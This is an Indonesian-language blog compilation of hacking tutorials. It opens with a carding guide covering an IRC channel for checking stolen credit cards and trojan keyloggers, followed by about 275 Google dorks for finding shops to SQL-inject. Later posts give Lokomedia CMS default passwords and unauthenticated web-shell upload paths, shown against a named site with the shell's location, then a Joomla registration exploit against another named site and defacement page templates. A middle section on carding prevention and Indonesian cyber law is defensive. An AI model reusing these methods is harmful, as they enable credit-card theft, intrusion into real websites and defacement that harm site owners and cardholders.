Pada postingan kali ini saya akan share tentang trik carding dengan memanfaatkan MIRC


Saya pelajari ilmu ini dari guru saya... Anonymous_leaks... yang selalu berpesan "berhenti bicara... mulai bekerja" kepada saya...
Ok, tanpa basa basi... karna saya juga udah capek basa basi.. jadi langsung saja kita ke langkah-langkahnya

Pertama, Ums/Mb masuk ke MIRC dan join ke #CCPOSTS.. di dalnet,,,
setelah itu ketik ! COMMAND, maka akan muncul perintah-perintah yang bisa kalian gunakan, perintah tersebut antara lain:
!CHK CC NUMBER VALID/CHK 1234567890 1202 Untuk mengetahui apakah Credit Card tersebut masih bisa di gunakan atau tidak.
!CVV2 CC NUMBER/CVV2 1234567890 Untuk mengetahui nomor identitas Credit Card.
!PROXY Uuntuk mengetahui proxy dan port yang mungkin bisa dipakai untuk mengelabui ISP.
!ORDER.LOG Untuk mengetahui nama alamat dan nomor Credit Card seseorang.
Hm..... Ok, selanjutnya Untuk mendapatkan Credit Card, kalian bisa menggunakan paket SNIFFES. Cari web yg system keamanannya buruk atau dalam bhs cybernya vulnerability. Kemudian kirimkan spyware seperti TROJAN atau WORM via email atau apa saja. Sebagai Key Logger, Program Ini akan mencatat aktifitas komputer target ke dalam sebuah file dan akan mengirimkannya ke email kamu

Ok, itulah sedikit trik singkat dari guru saya... semoga membantu... untuk lebih jelasnya... tanya langsung ke beliau... saya juga masih belajar...
Kumpulan Dork Carding 2014 - www.goblog.ml
Carding merupakan salah satu kejahatan di internet yang berupa penipuan dalam proses perbelanjaan, yaitu dengan berbelanja mengguakan nomor dan identitas kartu kredit orang lain yang diperoleh secara illegal dan biasanya dengan mencuri data di internet. Sasaran yang dituju oleh carder (sebutan bagi para penipu di internet) adalah website berbasis E-commerce yang memungkinkan data basenya menyimpan puluhan bahkan ratusan kartu kredit, paypal atau data nasabah bank.
Berikut adalah Dork yang dapat kamu gunakan untuk mencari target Carding :
  1. show_item_details.cfm?item_id=
  2. showbook.cfm?bookid=
  3. showStore.cfm?catID=
  4. shprodde.cfm?SKU=
  5. specials.cfm?id=
  6. store.cfm?id=
  7. store_bycat.cfm?id=
  8. store_listing.cfm?id=
  9. Store_ViewProducts.cfm?Cat=
  10. store-details.cfm?id=
  11. storefront.cfm?id=
  12. storefronts.cfm?title=
  13. storeitem.cfm?item=
  14. StoreRedirect.cfm?ID=
  15. subcategories.cfm?id=
  16. tek9.cfm?
  17. template.cfm?Action=Item&pid=
  18. topic.cfm?ID=
  19. tuangou.cfm?bookid=
  20. type.cfm?iType=
  21. updatebasket.cfm?bookid=
  22. updates.cfm?ID=
  23. view.cfm?cid=
  24. view_cart.cfm?title=
  25. view_detail.cfm?ID=
  26. viewcart.cfm?CartId=
  27. viewCart.cfm?userID=
  28. viewCat_h.cfm?idCategory=
  29. viewevent.cfm?EventID=
  30. viewitem.cfm?recor=
  31. viewPrd.cfm?idcategory=
  32. ViewProduct.cfm?misc=
  33. voteList.cfm?item_ID=
  34. whatsnew.cfm?idCategory=
  35. WsAncillary.cfm?ID=
  36. WsPages.cfm?ID=HP
  37. inurl:".php?cat="+intext:"Paypal"+site:UK
  38. inurl:".php?cat="+intext:"/Buy Now/"+site:.net
  39. inurl:".php?cid="+intext:"online+betting"
  40. inurl:".php?id=" intext:"View cart"
  41. inurl:".php?id=" intext:"Buy Now"
  42. inurl:".php?id=" intext:"add to cart"
  43. inurl:".php?id=" intext:"shopping"
  44. inurl:".php?id=" intext:"boutique"
  45. inurl:".php?id=" intext:"/store/"
  46. inurl:".php?id=" intext:"/shop/"
  47. inurl:".php?id=" intext:"toys"
  48. inurl:".php?cid="
  49. inurl:".php?cid=" intext:"shopping"
  50. inurl:".php?cid=" intext:"add to cart"
  51. inurl:".php?cid=" intext:"Buy Now"
  52. inurl:".php?cid=" intext:"View cart"
  53. inurl:".php?cid=" intext:"boutique"
  54. inurl:".php?cid=" intext:"/store/"
  55. inurl:".php?cid=" intext:"/shop/"
  56. inurl:".php?cid=" intext:"Toys"
  57. inurl:".php?cat="
  58. inurl:".php?cat=" intext:"shopping"
  59. inurl:".php?cat=" intext:"add to cart"
  60. inurl:".php?cat=" intext:"Buy Now"
  61. inurl:".php?cat=" intext:"View cart"
  62. inurl:".php?cat=" intext:"boutique"
  63. inurl:".php?cat=" intext:"/store/"
  64. inurl:".php?cat=" intext:"/shop/"
  65. inurl:".php?cat=" intext:"Toys"
  66. inurl:".php?catid="
  67. inurl:".php?catid=" intext:"View cart"
  68. inurl:".php?catid=" intext:"Buy Now"
  69. inurl:".php?catid=" intext:"add to cart"
  70. inurl:".php?catid=" intext:"shopping"
  71. inurl:".php?catid=" intext:"boutique"
  72. inurl:".php?catid=" intext:"/store/"
  73. inurl:".php?catid=" intext:"/shop/"
  74. inurl:".php?catid=" intext:"Toys"
  75. inurl:".php?categoryid="
  76. inurl:".php?categoryid=" intext:"View cart"
  77. inurl:".php?categoryid=" intext:"Buy Now"
  78. inurl:".php?categoryid=" intext:"add to cart"
  79. inurl:".php?categoryid=" intext:"shopping"
  80. inurl:".php?categoryid=" intext:"boutique"
  81. inurl:".php?categoryid=" intext:"/store/"
  82. inurl:".php?categoryid=" intext:"/shop/"
  83. inurl:".php?categoryid=" intext:"Toys"
  84. inurl:".php?pid="
  85. inurl:".php?pid=" intext:"shopping"
  86. inurl:".php?pid=" intext:"add to cart"
  87. inurl:".php?pid=" intext:"Buy Now"
  88. inurl:".php?pid=" intext:"View cart"
  89. inurl:".php?pid=" intext:"boutique"
  90. inurl:".php?pid=" intext:"/store/"
  91. inurl:".php?pid=" intext:"/shop/"
  92. inurl:".php?pid=" intext:"toys"
  93. inurl:".php?prodid=
  94. inurl:".php?prodid=" intext:"shopping"
  95. inurl:".php?prodid=" intext:"add to cart"
  96. inurl:".php?prodid=" intext:"Buy Now"
  97. inurl:".php?prodid=" intext:"View cart"
  98. inurl:".php?prodid=" intext:"boutique"
  99. inurl:".php?prodid=" intext:"/store/"
  100. inurl:".php?prodid=" intext:"/shop/"
  101. inurl:".php?prodid=" intext:"toys"
  102. inurl:".php?productid='
  103. inurl:".php?productid=" intext:"shopping"
  104. inurl:".php?productid=" intext:"add to cart"
  105. inurl:".php?productid=" intext:"Buy Now"
  106. inurl:".php?productid=" intext:"View cart"
  107. inurl:".php?productid=" intext:"boutique"
  108. inurl:".php?productid=" intext:"/store/"
  109. inurl:".php?productid=" intext:"/shop/"
  110. inurl:".php?productid=" intext:"Toys"
  111. inurl:".php?product="
  112. inurl:".php?product=" intext:"shopping"
  113. inurl:".php?product=" intext:"add to cart"
  114. inurl:".php?product=" intext:"Buy Now"
  115. inurl:".php?product=" intext:"View cart"
  116. inurl:".php?product=" intext:"boutique"
  117. inurl:".php?product=" intext:"/store/"
  118. inurl:".php?product=" intext:"/shop/"
  119. inurl:".php?product=" intext:"toys"
  120. inurl:".php?product=" intext:"DVD"
  121. inurl:".php?products="
  122. inurl:".php?products=" intext:"shopping"
  123. inurl:".php?products=" intext:"add to cart"
  124. inurl:".php?products=" intext:"Buy Now"
  125. inurl:".php?products=" intext:"View cart"
  126. inurl:".php?products=" intext:"boutique"
  127. inurl:".php?products=" intext:"/store/"
  128. inurl:".php?products=" intext:"/shop/"
  129. inurl:".php?products=" intext:"toys"
  130. inurl:".php?products=" intext:"DVD"
  131. inurl:".php?proid="
  132. inurl:".php?proid=" intext:"shopping"
  133. inurl:".php?proid=" intext:"add to cart"
  134. inurl:".php?proid=" intext:"Buy Now"
  135. inurl:".php?proid=" intext:"View cart"
  136. inurl:".php?proid=" intext:"boutique"
  137. inurl:".php?proid=" intext:"/store/"
  138. inurl:".php?proid=" intext:"/shop/"
  139. inurl:".php?proid=" intext:"toys"
  140. inurl:".php?shopid="
  141. inurl:".php?shopid=" intext:"shopping"
  142. inurl:".php?shopid=" intext:"add to cart"
  143. inurl:".php?shopid=" intext:"Buy Now"
  144. inurl:".php?shopid=" intext:"View cart"
  145. inurl:".php?shopid=" intext:"boutique"
  146. inurl:".php?shopid=" intext:"/store/"
  147. inurl:".php?shopid=" intext:"/shop/"
  148. inurl:".php?shopid=" intext:"Toys"
  149. inurl:".php?itemid="
  150. inurl:".php?itemid=" intext:"shopping"
  151. inurl:".php?itemid=" intext:"add to cart"
  152. inurl:".php?itemid=" intext:"Buy Now"
  153. inurl:".php?itemid=" intext:"View cart"
  154. inurl:".php?itemid=" intext:"boutique"
  155. inurl:".php?itemid=" intext:"/shop/"
  156. inurl:".php?itemid=" intext:"/store/"
  157. inurl:".php?itemid=" intext:"Toys"
  158. inurl:".php?orderid="
  159. inurl:".php?orderid=" intext:"shopping"
  160. inurl:".php?orderid=" intext:"add to cart"
  161. inurl:".php?orderid=" intext:"Buy Now"
  162. inurl:".php?orderid=" intext:"View cart"
  163. inurl:".php?orderid=" intext:"boutique"
  164. inurl:".php?orderid=" intext:"/shop/"
  165. inurl:".php?orderid=" intext:"/store/"
  166. inurl:".php?orderid=" intext:"Toys"
  167. inurl:".php?catalogId="
  168. inurl:".php?catalogId=" intext:"shopping"
  169. inurl:".php?catalogId=" intext:"add to cart"
  170. inurl:".php?catalogId=" intext:"Buy Now"
  171. inurl:".php?catalogId=" intext:"View cart"
  172. inurl:".php?catalogId=" intext:"boutique"
  173. inurl:".php?catalogId=" intext:"/shop/"
  174. inurl:".php?catalogId=" intext:"/store/"
  175. inurl:".php?catalogId=" intext:"Toys"
  176. inurl:".php?aid="
  177. inurl:".php?aid=" intext:"shopping"
  178. inurl:".php?aid=" intext:"add to cart"
  179. inurl:".php?aid=" intext:"Buy Now"
  180. inurl:".php?aid=" intext:"View cart"
  181. inurl:".php?aid=" intext:"boutique"
  182. inurl:".php?aid=" intext:"/shop/"
  183. inurl:".php?aid=" intext:"/store/"
  184. inurl:".php?aid=" intext:"toys"
  185. inurl:".php?artid="
  186. inurl:".php?artid=" intext:"shopping"
  187. inurl:".php?artid=" intext:"add to cart"
  188. inurl:".php?artid=" intext:"Buy Now"
  189. inurl:".php?artid=" intext:"View cart"
  190. inurl:".php?artid=" intext:"boutique"
  191. inurl:".php?artid=" intext:"/shop/"
  192. inurl:".php?artid=" intext:"/store/"
  193. inurl:".php?artid=" intext:"toys"
  194. inurl:".php?articleid="
  195. inurl:".php?articleid=" intext:"shopping"
  196. inurl:".php?articleid=" intext:"add to cart"
  197. inurl:".php?articleid=" intext:"Buy Now"
  198. inurl:".php?articleid=" intext:"View cart"
  199. inurl:".php?articleid=" intext:"boutique"
  200. inurl:".php?articleid=" intext:"/shop/"
  201. inurl:".php?articleid=" intext:"/store/"
  202. inurl:".php?articleid=" intext:"toys"
  203. cat.asp?cat=
  204. productlist.asp?catalogid=
  205. Category.asp?category_id=
  206. Category.cfm?category_id=
  207. category.asp?cid=
  208. category.cfm?cid=
  209. category.asp?cat=
  210. category.cfm?cat=
  211. category.asp?id=
  212. index.cfm?pageid=
  213. category.asp?catid=
  214. Category.asp?c=
  215. Category.cfm?c=
  216. productlist.cfm?catalogid=
  217. productlist.asp?catalogid=
  218. viewitem.asp?catalogid=
  219. viewitem.cfm?catalogid=
  220. catalog.cfm?catalogId=
  221. catalog.asp?catalogId=
  222. department.cfm?dept=
  223. department.asp?dept=
  224. itemdetails.cfm?catalogId=
  225. itemdetails.asp?catalogId=
  226. product_detail.asp?catalogid=
  227. product_detail.cfm?catalogid=
  228. product_list.asp?catalogid=
  229. product_list.cfm?catalogid=
  230. ShowProduct.cfm?CatID=
  231. ShowProduct.asp?CatID=
  232. search_results.cfm?txtsearchParamCat=
  233. search_results.asp?txtsearchParamCat=
  234. itemdetails.cfm?catalogId=
  235. itemdetails.asp?catalogId=
  236. store-page.cfm?go=
  237. store-page.asp?go=
  238. Detail.cfm?CatalogID=
  239. Detail.asp?CatalogID=
  240. browse.cfm?category_id=
  241. view.cfm?category_id=
  242. products.cfm?category_id=
  243. index.cfm?Category_ID=
  244. detail.cfm?id=
  245. category.cfm?id=
  246. showitems.cfm?category_id=
  247. ViewProduct.asp?PID=
  248. ViewProduct.cfm?PID=
  249. shopdisplayproducts.asp?catalogid=
  250. shopdisplayproducts.cfn?catalogid=
  251. displayproducts.cfm?category_id=
  252. displayproducts.asp?category_id=
  253. DisplayProducts.asp?prodcat=
  254. DisplayProducts.cfm?prodcat=x
  255. productDetail.cfm?ProductID=
  256. products.php?subcat_id=
  257. showitem.cfm?id=21
  258. productdetail.cfm?pid=
  259. default.cfm?action=46
  260. products_accessories.asp?CatId=
  261. Store_ViewProducts.asp?Cat=
  262. category.cfm?categoryID=
  263. category.asp?category=
  264. tepeecart.cfm?shopid=
  265. view_product.asp?productID=
  266. ProductDetails.asp?prdId=12
  267. products.cfm?ID=
  268. detail.asp?product_id=
  269. product_detail.asp?product_id=
  270. products.php?subcat_id=
  271. product.php?product_id=
  272. view_product.cfm?productID=
  273. product_details.asp?prodid=
  274. shopdisplayproducts.cfm?id=
  275. displayproducts.cfm?id=
Silahkan kembangkan lagi Dork - Dork diatas untuk mendapatkan web yang vuln buat di inject menggunakan Havij maupun SQL map.


Carding adalah penyalahgunaan data kartu kredit yang biasa dilakukan oleh pengguna internet yang tidak bertanggung jawab untuk belanja online dengan menggunakan kartu kredit orang lain secara ilegal. Cara melakukan carding yang cukup mudah membuat teknik ini marak di tahun 1999. Seorang pelaku carding (carder) tidak perlu mencuri kartu kredit orang lain tersebut untuk melakukan transaksi di internet. Sebagai informasi, transaksi kartu kredit di internet cukup dilakukan dengan memasukkan nomor kartu kredit dan nomor rahasia yang biasanya terdiri dari 3 digit di balik kartu dan nomor kadaluarsa kartu tersebut.
Cara Mencegah Carding

Rahasiakan nomor kartu kredit anda
Nomor Kartu Kredit merupakan hal yang sangat rahasia dan hampir sama dengan nomor PIN ATM kita. Untuk mencegah Carding kita harus merahasiakan nomor kartu kredit kita. Ini diperburuk dengan adanya fakta bahwa kebanyakan tanggal kadaluarsa kartu kredit di Indonesia adalah akhir tahun, dan ini membuat carder cukup beraksi dengan memasukkan nomor kartu dan nomor rahasianya saja.
Hindari transaksi online menggunakan internet wireless
Tidak menutup kemungkinan bahwa dibalik koneksi internet melalui wireless ada pengguna lain yang bermaksud jahat melakukan spoofing atas packet data yang bertebaran dengan maksud mendapat berbagai macam data rahasia yang berguna baginya termasuk data kartu kredit anda. Dengan alasan inilah sebaiknya transaksi online di internet jangan menggunakan wireless terutama hot spot yang bersifat gratis.
Setelah melakukan transaksi selalu hapus cookies anda
Bagi yang belum tahu, cookies bertugas untuk menyimpan seluruh data yang kita masukkan pada suatu situs untuk mengingat bagaimana cara melayani kita dan dengan privilege apa kita bisa dilayani. Intinya begini seluruh data yang kita masukkan pada suatu situs akan diingat oleh situs tersebut dengan memanfaatkan fitus cookies. Tidak menutup kemungkinan cookies akan menyimpan data kartu kredit yang kita masukkan di sits tersebut karena inilah selalu hapus cookies dari komputer setelah kita selesai melakukan transaksi online karena cookies bisa saja mempunyai umur yang panjang di dalam komputer tersebut
Pastikan Komputer aman dari program keylogger
Keylogger adalah sebuah program yang mencatat apapun yang kita ketikkan di komputer. Biasanya keylogger dipakai oleh seorang hacker (saya lebih suka menyebutnya pencuri) untuk mendapatkan userid dan password seseorang ketika sedang login di komputer. Pada prakteknya karena semua yang diketikkan oleh user tercatat di keylogger, aplikasi ini bisa digunakan untuk mencatat nomor kartu kredit dan data rahasia lain yang diperlukan untuk melakukan carding. Karena hal inilah pastikan tidak ada program keylogger yang aktif/program sejenis bila kita ingin bertransaksi online.
Cek Data Secara Berkala
Selalu pastikan bahwa data bank anda aman secara berkala. Yang saya maksud disini adalah pastikan tidak ada transaksi yang tidak beralasan. Kalaupun ada kekurangan 1 rupiah, jangan disepelekan kalau tidak ada penjelasan dari pihak bank. Bayangkan pendapatan seorang carder bila berhasil mencuri 1 rupiah dari sekian milyar orang. Bukankah dia telah mendapat 1 Milyar tiap bulan?
Hancurkan Slip Transaksi ATM
Slip transaksi ATM sebaiknya selalu dihancurkan ketika selesai melakukan transaksi di ATM. Tidak menutup kemungkinan bahwa ada pola tertentu yang dipakai sebuah bank yang membuka pintu kemungkinan bagi para carder untuk mencari data yang mereka perlukan guna melakukan transaksi online atas beban rekening bank anda.
Hati-hati Situs Palsu
Terbayang akan kemungkinan adanya situs palsu di Internet? Bayangkan kalau ternyata ada situs lain yang mirip dengan klikBCA dan banyak nasabah BCA yang tertipu masuk ke situs tersebut dan melakukan transaksi online? Bisa dipastikan admin situs palsu tersebut akan panen userid dan password para nasabah BCA yang bisa digunakan untuk kepentingan transaksi onlinenya.
 
Cara Hacker curi data Credit Card (carding) 

Tips Ada beberapa cara yang digunakan oleh hacker dalam mencuri kartu kredit, antara lain:
1. Paket sniffer, cara ini adalah cara yang paling cepat untuk mendapatkan data apa saja. Konsep kerjanya mereka cukup memakai program yang dapat melihat atau membuat logging file dari data yang dikirim oleh website e-commerce (penjualan online) yang mereka incar. Pada umumnya mereka mengincar website yang tidak dilengkapi security encryption atau situs yang tidak memiliki security yang bagus. 
2. Membuat program spyware, trojan, worm dan sejenisnya yang berfungsi seperti keylogger (keyboard logger, program mencatat aktifitas keyboard) dan program ini disebar lewat E-mail Spamming (taruh file-nya di attachment), mirc (chatting), messenger (yahoo, MSN), atau situs-situs tertentu dengan icon atau iming-iming yang menarik netter untuk mendownload dan membuka file tersebut. Program ini akan mencatat semua aktivitas komputer anda ke dalam sebuah file, dan akan mengirimnya ke email hacker. Kadang-kadang program ini dapat dijalankan langsung kalau anda masuk ke situs yang di buat hacker atau situs porno. 
3. Membuat situs phising, yaitu situs sejenis atau kelihatan sama seperti situs aslinya. contoh di Indonesia ketika itu situs klik bca (www.klikbca.com), pernah mengalami hal yang sama. situs tersebut tampilannya sama seperti klikbca tetapi alamatnya dibikin beberapa yang berbeda seperti www.clikbca.com, www.kikbca.com, dll, jadi kalau netter yang salah ketik, akan nyasar ke situs tersebut. Untungnya orang yang membuat situs tersebut katanya tidak bermaksud jahat. Nah kalau hacker carding yang buat tuh situs, siap-siap deh kartu kredit anda bakal jebol.
4. Menjebol situs e-commerce itu langsung dan mencuri semua data para pelanggannya. Cara ini agak sulit dan perlu pakar hacker atau hacker yang sudah pengalaman untuk melakukannya. Pada umumnya mereka memakai metode injection (memasukan script yang dapat dijalankan oleh situs/server) bagi situs yang memiliki firewall. Ada beberapa cara injection antara lain yang umum digunakan html injection dan SQL injection. Bagi situs yang tidak memiliki security atau firewall, siap-siaplah dikerjain abis-abisan. Ada beberapa cara lagi yang dilakukan para hacker, tapi cara-cara di atas adalah cara yang paling umum dilakukan hacker untuk carding. Cara yang tidak umum akan dijelaskan nanti di lain waktu.. segala tindakan yang anda lakukan adalah beresiko , so Take your own risk.
.Hal-hal yang diatur dalam UU ITE secara garis besar

Secara garis besar UU ITE mengatur hal-hal sebagai berikut :
* Tanda tangan elektronik memiliki kekuatan hukum yang sama dengan tanda tangan konvensional (tinta basah dan bermaterai). Sesuai dengan e-ASEAN Framework Guidelines (pengakuan tanda tangan digital lintas batas).
* Alat bukti elektronik diakui seperti alat bukti lainnya yang diatur dalam KUHP.
* UU ITE berlaku untuk setiap orang yang melakukan perbuatan hukum, baik yang berada di wilayah Indonesia maupun di luar Indonesia yang memiliki akibat hukum di Indonesia.
* Pengaturan Nama domain dan Hak Kekayaan Intelektual.
* Perbuatan yang dilarang (cybercrime) dijelaskan pada Bab VII (pasal 27-37):
o Pasal 27 (Asusila, Perjudian, Penghinaan, Pemerasan)
o Pasal 28 (Berita Bohong dan Menyesatkan, Berita Kebencian dan Permusuhan)
o Pasal 29 (Ancaman Kekerasan dan Menakut-nakuti)
o Pasal 30 (Akses Komputer Pihak Lain Tanpa Izin, Cracking)
o Pasal 31 (Penyadapan, Perubahan, Penghilangan Informasi)
o Pasal 32 (Pemindahan, Perusakan dan Membuka Informasi Rahasia)
o Pasal 33 (Virus?, Membuat Sistem Tidak Bekerja (DOS?))
o Pasal 35 (Menjadikan Seolah Dokumen Otentik (phising?))
Berdasarkan Sasaran Kejahatannya

1.      Menyerang Individu (Against Person)

Jenis kejahatan ini, sasaran serangannya ditujukan kepada perorangan atau individu yang memiliki sifat atau criteria tertentu sesuai tujuan penyerangan tersebut. Beberapa contoh kejahatan ini antara lain : Pornografi, Cyberstalking, Cyber Tresspass

2.      Menyerang Hak Milik (Against Property)

Cybercrime yang dilakukan untuk mengganggu atau menyerang hak milik orang lain. Contoh: carding, cybersquatting, typosquatting, hijacking, data forgery

3.      Menyerang Pemerintah (Against Government)

 

Cybercrime Against Government dilakukan dengan tujuan khusus penyerangan terhadap pemerintah

 Dampak Cybercrime Terhadap Keamanan Negara

1.      Kurangnya kepercayaan dunia terhadap Indonesia
2.      Berpotensi menghancurkan negara
Dampak Cybercrime Terhadap Keamanan Dalam Negeri

1.      Kerawanan social dan politik yang ditimbulkan dari Cybercrime antara lain isu-isu yang meresahkan, memanipulasi simbol-simbol kenegaraan, dan partai politik dengan tujuan untuk mengacaukan keadaan agar tercipta suasana yang tidak kondusif.

2.      Munculnya pengaruh negative dari maraknya situs-situs porno yang dapat diakses bebas tanpa batas yang dapat merusak moral bangsa.

Menuju UU Cyber Republik Indonesia
Strategi Penanggulangan Cyber Crime


A.       Strategi Jangka Pendek
1.      Penegakan hukum pidana
2.      Mengoptimalkan UU khusus lainnya
3.      Rekruitment aparat penegak hukum

B.      Strategi Jangka Menengah
1.      Cyber police
2.      Kerjasama internasional

C.       Strategi Jangka Panjang
1.      Membuat UU cyber crime
2.      Membuat perjanjian bilateral
Sebelumnya ane kasih info kalau Lokomedia adalah CMS asli buatan Indonesia jadi kalau kalian nemu bug nya jangan diobrak abrik ya . Contact adminnya atau kalo bisa di patch ssekalian. :D
Sebenarnya ini bug lama sih. tapi jika kalian sabar dan beruntung tentunya, kalian tetap bisa mendapatkan target vuln dengan bug Lokomedia.
Ada banyak bug lokomedia. Ane jelasin satu satu.

Lokomedia Default Password .
Banyak admin admin situs yang tidak mengubah default password dari CMS Lokomedia.
caranya :
Masuk ke login adminnya di localhost/admin/ atau localhost/adminweb/
Dan berikut adalah daftar user serta password CMS Lokomedia
admin : admin
wiro : sableng
sinto : gendeng
joko : sembung


Bug Upload di CMS Lokomedia
Nah, kalo yang ini, kadang script lama  lokomedia belum diupdate sama webmasternya sehingga kita bisa melakukan upload dari halaman admin tanpa login. ataupun kita bisa melakukan aksi add user .
Jika emmang bug nya add user, caranya adalah masuk ke
site/adminweb/content.php?module=user lalu tambahkan user serta password disitu.
Selanjutnya kalian bisa login di /adminweb/ atau /admin/ (tergantung letak halaman loginnya)

Lalu yang kedia adalah bug di modul download
site/adminweb/content.php?module=download . disitu kalian bisa upload shell kalian, dan letak file nya adalah di site/files/namashell.php .

Yang ketiga adalah bug di modul banner.
yaitu di site/adminweb/content.php?module=banner . kalian langsung saja tambahkan banner . letak shellnya ada di site/foto_banner/namashell.php .


Oke, kali ini ane nemu web dengan bug add banner di ikamesinits.org .
masuk ke http://www.ikamesinits.org/adminweb/content.php?module=banner
 
 
lalu klik "tambah Banner"


Setelah upload selesai kadang memang ada notice "anda harus login"
tapi coba kita lihat apa upload nya berhasil, cek di
http://www.ikamesinits.org/adminweb/content.php?module=banner
 


Berhasil kan ?
Akses shellnya di site/foto-banner/namashell.php
Karena ane tadi upload file sendy.php , maka file nya ada di
http://www.ikamesinits.org/foto_banner/sendy.php
 

Sekarang terserah kalian mau diapain tuh site

www.ikamesinits.org

Sekian dan jangan disalahgunakan :D
Use at Your Own Risk !!
Oke, sebenarnya ini cara lama sih :v . Tapi karena saya bari kemarin tertarik untuk menggunakan exploit ini, jadi ya baru sekarang saya share di blog . :v . Oke, langsung saja sob .
Bahan bahan yang di perlukan :
Joomla Exploit Com_User (save dengan format html)
Dork : intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com (kembangkan sendiri)
Exploit : /index.php?option=com_users&view=registration
Oke, mulai dorking di google :p . saya ambil contoh askandans.com . Lalu masukkan exploitnya www.askandans.com/index.php?option=com_users&view=registration
Maka anda akan dibawa ke halaman registrasi :


 
Coba ctrl+u , lalu ctrl+f . cari kata hidden" . Cari kode seperti di bawah :


Sekarang, buka file html exploit joomla yang sudah sobat download tadi, isi data-datanya dengan benar :

 
Jangan lupa juga sesuaikan code yang tadi sudah anda dapatkan :


Lalu buka file html nya lewat browser, klik register :

Sukses !

 
Tinggal cek email, dan aktivasi :

 
Tinggal login dengan user dan password tadi :

Sekarang terserah anda mau diapain . hahahahaha
Sekian dan semoga bermanfaat :)
Kali ini saya akan share tutorial yang mungkin berguna bagi para newbie seperti saya. Entah kenapa, biasanya orang yang baru belajar deface selalu penasaran untuk mendeface index suatu website. Padahal, defacer ternama seperti Hmei7 saja biasanya hanya menitip file indonesia.htm . Atau mungkin anda bisa melihat hasil dari defacer ganteng yang punya nick ./Akicha , dia hanya menitip file akicha.html. :v .
Oke, saya sumsikan sobat sudah menginstall localhost. Terserah mau pake apa. Saya pakai Xampp.
Pertama, jalankan Xampp Control Panel.
Jika sudah, coba buka browser dan ketik localhost di address bar. Maka akan diredirrect ke localhost/xampp .
Tampilannya seperti ini :

 

Dan misi kita kali ini adalah menghajar index localhost agar tidak diredirrect ke /xampp/ .
Sekarang sobat masuk ke direktori dimana sobat menginstall Xampp. Lalu masuk ke folder /htdocs/
Disana ada file index.html serta index.php yang berfungsi meredirrect localhost ke localhost/xampp .
Silahkan mau dihapus atau direname. Lebih baik direname saja yang penting kedua file tersebut tidak lagi berfungsi. Saya rename menjadi index2.  

Lihat gambar :
 

Lalu, Kita buat index.html baru yang sudah berisi script deface kita. Lihat gambar :

Oke, sekarang saatnya dieksekusi
Buka browser, ketik localhost di address bar.

Selamat, kalian berhasil deface index. Sekian tutorial kali ini, semoga rasa penasaran kalian terobati
Kali ini saya akan share tutorial yang mungkin "tidak diperlukan" lagi oleh para master deface. Namun meski tidak mainstream masih ada yang bertanya cara membuat Script HTML/ Script Deface. Oleh karena itu saya mencoba berbagi apa yang saya ketahui, membuat basic script HTML secara manual. Yang saya gunakan disini hanyalah Notepad.
Oke, sebelumnya perlu diketahui bahwa script HTML terdiri dari HEAD dan BODY. Head untuk menaruh judul dan meta tag sementara body diisi dengan notice/gambar deface.
Kira-kira susunannya seperti ini :

<HTML>
<head>
[kode HTML]
</head>
<body>
[Kode HTML]
</body>
</HTML>
Kita coba membuat title/judul halaman deface dan isi.
Perhatikan saja script sederhana berikut.

<HTML>
<head>
<title>HACKED BY NABILAHOLIC</title>
</head>
<body>
Just simple script by nabilaholic
</body>
</HTML>
Simpan dengan format .html . Sebagai contoh saya simpan dengan nama hacked.html . Coba buka menggunakan firefox/chrome sobat.


Sip, langkah awal sudah berhasil.
Tahap kedua, kita coba untuk mengatur warna, besar huruf dan menengahkan huruf.
Simak saja scriptnya :
<HTML>
<head>
<title>HACKED BY NABILAHOLIC</title>
</head>
<body>
<center><FONT COLOR="red"><FONT SIZE=6>Just simple script by nabilaholic</FONT></FONT></center>
</body>
</HTML>
 Untuk font color bisa diganti dengan green, blue dll. Begitu juga dengan font size. Ini hasilnya :
 


Tahap ketiga, kita coba memberi warna background pada script HTML.
Lihat script berikut :
<HTML>
<head>
<title>HACKED BY NABILAHOLIC</title>
</head>
<body BGCOLOR="black">
<center><FONT COLOR="red"><FONT SIZE=6>Just simple script by nabilaholic</FONT></FONT></center>
</body>
</HTML>
Tinggal menambahkan BGCOLOR di samping kode <body dan sebelum tanda tutp [>]
Save dan lihat hasilnya.


Tahap membuat script HTML bagi pemula sudah hampir selesai. Sekarang kita coba untuk menambah gambar pada script HTML kita.
Lihat script berikut :
<HTML>
<head>
<title>HACKED BY NABILAHOLIC</title>
</head>
<body BGCOLOR="black">
<center><FONT COLOR="red"><FONT SIZE=6>Just simple script by nabilaholic</FONT></FONT></center>
<center><img src="http://1.bp.blogspot.com/-awbsg8MgV4c/UVbca0UvPpI/AAAAAAAAAX0/u1cje4XtGtY/s1600/heavyrotation.jpg" width="860" height="264""><center>
</body>
</HTML>

URL gambar yang saya beri warna biru bisa kalian ganti sendiri. Begitu juga dengan width dan height. Untuk gambarnya bisa cari di google atau upload di hosting upload gambar . Ex : google picasa, photobucket, dll.

 


Sekarang,kita coba tambahkan meta tag di komponen HEAD. Apa sih fungsi meta tag ?
Untuk member description dan keyword di hasil pencarian google. Mungkin kalau dijelaskan dengan kata-kata sulit, coba lihat saja gambar berikut.



Kata yang saya beri tanda merah, itulah yang disebut META DESCRIPTION.
Lihat script berikut :
<HTML>
<head>
<title>HACKED BY NABILAHOLIC</title>
<meta name="description" content="You Got Hacked by Nabilaholic ? Where the security !" />
</head>
<body BGCOLOR="black">
<center><FONT COLOR="red"><FONT SIZE=6>Just simple script by nabilaholic</FONT></FONT></center>
<center><img src="http://1.bp.blogspot.com/-awbsg8MgV4c/UVbca0UvPpI/AAAAAAAAAX0/u1cje4XtGtY/s1600/heavyrotation.jpg" width="860" height="264""><center>
</body>
</HTML>

Sebenarnya masih banyak meta tag seperti meta keyword, robots, title , dll. Namun karena ini adalah tahap perkenalan, pasang yang penting saja dulu. Yaitu meta description.

Selanjutnya, kita coba sedikit menghias script kita dengan tulisan berjalan [marquee] dan berkedip [blink].
Lihat saja kode berikut :
<HTML>
<head>
<title>HACKED BY NABILAHOLIC</title>
<meta name="description" content="You Got Hacked by Nabilaholic ? Where the security !" />
</head>
<body BGCOLOR="black">
<center><FONT COLOR="red"><FONT SIZE=6><blink>Just simple script by nabilaholic</blink></FONT></FONT></center>
<center><img src="http://1.bp.blogspot.com/-awbsg8MgV4c/UVbca0UvPpI/AAAAAAAAAX0/u1cje4XtGtY/s1600/heavyrotation.jpg" width="860" height="264""><center>
